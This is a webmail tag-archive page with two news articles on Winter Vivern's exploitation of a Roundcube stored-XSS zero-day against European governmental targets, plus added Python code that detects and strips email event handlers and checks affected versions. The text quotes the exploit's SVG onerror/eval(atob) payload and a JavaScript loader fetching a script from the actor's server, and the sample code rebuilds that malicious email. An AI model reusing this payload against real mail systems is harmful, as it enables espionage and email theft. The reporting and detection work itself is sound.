Tag Archive for: webmail

New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail


Read the technical details of this zero-day, which was used against governmental entities and a think tank in Europe, learn about the Winter Vivern threat actor, and get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack focused on exploiting a zero-day vulnerability in Roundcube webmail, with the result being the ability to list folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.

Technical details about this cyberattack exploiting a zero-day in Roundcube

The threat actor starts the attack by sending a specially crafted email message with the subject line “Get started in your Outlook”, sent from “team.management@outlook(.)com” (Figure A).

Figure A: Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, an SVG tag contains a base64-encoded malicious payload; it is hidden from the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg"> <image href="http://www.bing.com/news/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The goal of the malicious code is to trigger the onerror attribute: the image’s href points at an invalid URL (ending in x), so the image fails to load and the handler runs.

Decoding the payload in the onerror attribute results in a line of JavaScript code that will be executed in the victim’s browser in the context of the user’s Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou’s discovery. The researcher established that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which failed to “… properly sanitize the malicious SVG…
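The two sides of the issue described above, as an added Python example (not ESET’s or Roundcube’s code): a scanner that flags inline event-handler attributes in HTML email, decodes any atob('…') literal they carry and pulls out the URLs it finds, and a stripper that does what the sanitizer should have done by dropping every on* attribute. The sample email is constructed here in the shape the article describes; the base64 body is the loader script quoted above, with the C2 domain kept in its defanged form.

```python
import base64
import html
import re
from html.parser import HTMLParser

# Constructed sample (not ESET's data): an HTML email tail shaped like the one
# described above; the base64 body is the loader script quoted in the article,
# with the C2 domain kept in its defanged form.
LOADER_JS = ("var fe=document.createElement('script');"
             'fe.src="https://recsecas[.]com/controlserver/checkupdate.js";'
             "document.body.appendChild(fe);")
SAMPLE_EMAIL_HTML = (
    "<html><body><p>Get started in your Outlook</p>"
    '<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg">'
    '<image href="http://www.bing.com/news/x" onerror="eval(atob(\'{b64}\'))" />'
    "</svg></body></html>"
).format(b64=base64.b64encode(LOADER_JS.encode()).decode())

ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

class EventHandlerFinder(HTMLParser):
    """Records every on* attribute, noting whether it sits inside an <svg>."""
    def __init__(self):
        super().__init__()
        self.findings, self.svg_depth = [], 0

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            self.svg_depth += 1
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.findings.append({"tag": tag, "attr": name, "value": value or "",
                                      "in_svg": self.svg_depth > 0})

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1

def decode_atob_payloads(handler_js):
    """Base64-decode every atob('...') literal found in an event handler."""
    decoded = []
    for b64 in ATOB_RE.findall(handler_js):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass: skip junk
            continue
    return decoded

def scan_email_html(email_html):
    """One finding per inline event handler, with decoded payloads and any URLs."""
    parser = EventHandlerFinder()
    parser.feed(email_html)
    parser.close()
    results = []
    for finding in parser.findings:
        payloads = decode_atob_payloads(finding["value"])
        urls = [u for p in payloads for u in URL_RE.findall(p)]
        results.append({**finding, "decoded": payloads, "urls": urls})
    return results

class EventHandlerStripper(HTMLParser):
    """Re-emits the document with every on* attribute dropped (the mitigation side)."""
    def __init__(self):
        super().__init__()
        self.out, self.dropped = [], 0

    def _attrs(self, attrs):
        kept = []
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.dropped += 1
            else:
                kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(attrs)} />")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

def strip_event_handlers(email_html):
    """Return (sanitized_html, number_of_handlers_removed)."""
    stripper = EventHandlerStripper()
    stripper.feed(email_html)
    stripper.close()
    return "".join(stripper.out), stripper.dropped
```

scan_email_html(SAMPLE_EMAIL_HTML) returns a single finding on the image tag’s onerror attribute, marked as sitting inside an SVG, with the decoded loader and its script URL; running the scanner again over the output of strip_event_handlers returns nothing, which is the check a mail gateway or washtml-style filter should pass. Dropping every on* attribute is deliberately blunt: no event handler has a legitimate use in a rendered email, so an allow-list of safe attributes is simpler to reason about than trying to recognise malicious ones.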


Winter Vivern APT Blasts Webmail Zero-Day Bug With One-Click Exploit


Low-profile threat group Winter Vivern has been exploiting a zero-day flaw in Roundcube Webmail servers through a malicious email campaign targeting governmental organizations and a think tank in Europe; the attack requires only that a user view a message.

Earlier this month, researchers at ESET Research observed the group sending a specially crafted email message that loads arbitrary JavaScript code in the context of the Roundcube user’s browser window to exploit a newly discovered cross-site scripting (XSS) flaw tracked as CVE-2023-5631. The one-click exploit requires no manual interaction on the part of the user other than viewing the message in a Web browser, the researchers reported in a blog post published Oct. 25.

Roundcube is a freely available, open source webmail solution that’s especially popular with small-to-midsize organizations. The flaw affects versions before 1.4.15, 1.5.x before 1.5.5, and 1.6.x before 1.6.4, and allows for stored XSS via an HTML email message with a crafted SVG document due to the behavior of “program/lib/Roundcube/rcube_washtml.php,” according to its CVE listing. This, in turn, allows a remote attacker to load arbitrary JavaScript code.

ESET Research reported the vulnerability to the Roundcube team on Oct. 12 and received a response and patch from the company two days later on Oct. 14. On Oct. 16, Roundcube released security updates with new versions 1.6.4, 1.5.5, and 1.4.15 to address the flaw.
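A small inventory check, added here as an example (not a Roundcube or ESET tool), that encodes only the affected ranges stated above: a 1.4.x, 1.5.x or 1.6.x install is affected when it is older than the fixed release for its branch, and anything older than the 1.4 branch falls under “versions before 1.4.15”. Branches newer than 1.6 are not in the listing and are reported as not affected by it; a pre-release suffix such as “-rc” is ignored, which is an assumption of this script.

```python
# Fixed releases per branch, as listed in the article: 1.4.15, 1.5.5 and 1.6.4.
FIXED = {(1, 4): (1, 4, 15), (1, 5): (1, 5, 5), (1, 6): (1, 6, 4)}

def parse_version(text):
    """'1.6.3' -> (1, 6, 3); a suffix such as '-rc1' is dropped (assumption)."""
    core = text.strip().split("-")[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:          # pad '1.6' to (1, 6, 0)
        parts.append(0)
    return tuple(parts[:3])

def is_affected(version_text):
    """True if the version falls inside one of the affected ranges above."""
    v = parse_version(version_text)
    branch = v[:2]
    if branch in FIXED:
        return v < FIXED[branch]   # 1.4.x / 1.5.x / 1.6.x before their fix
    return v < FIXED[(1, 4)]       # "versions before 1.4.15" covers older branches

def triage(version_texts):
    """Map each reported version string to a verdict for an inventory report."""
    return {t: ("affected" if is_affected(t) else "not affected") for t in version_texts}
```

Feed triage() the version strings collected from each host (for example, the value shown on the Roundcube about page) and patch every host reported as affected to its branch’s fixed release or later.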

Long-Term Targeting

Winter Vivern’s activity is often underreported by security researchers, but the group has been active since at least December 2020 and shows sympathies with Russia and Belarus, conducting cyber espionage that serves the interests of those nations. The group typically uses malicious documents, phishing websites, and a custom PowerShell backdoor to compromise its targets and may be linked to the sophisticated Belarus-aligned group MoustachedBouncer.

The latest activity observed by ESET, which has been tracking Winter Vivern closely for about a year, is consistent with the group’s typical methods, though previously the group exploited flaws that were already public, notes ESET researcher Matthieu Faou.

“Since at least 2022, they have been exploiting XSS…
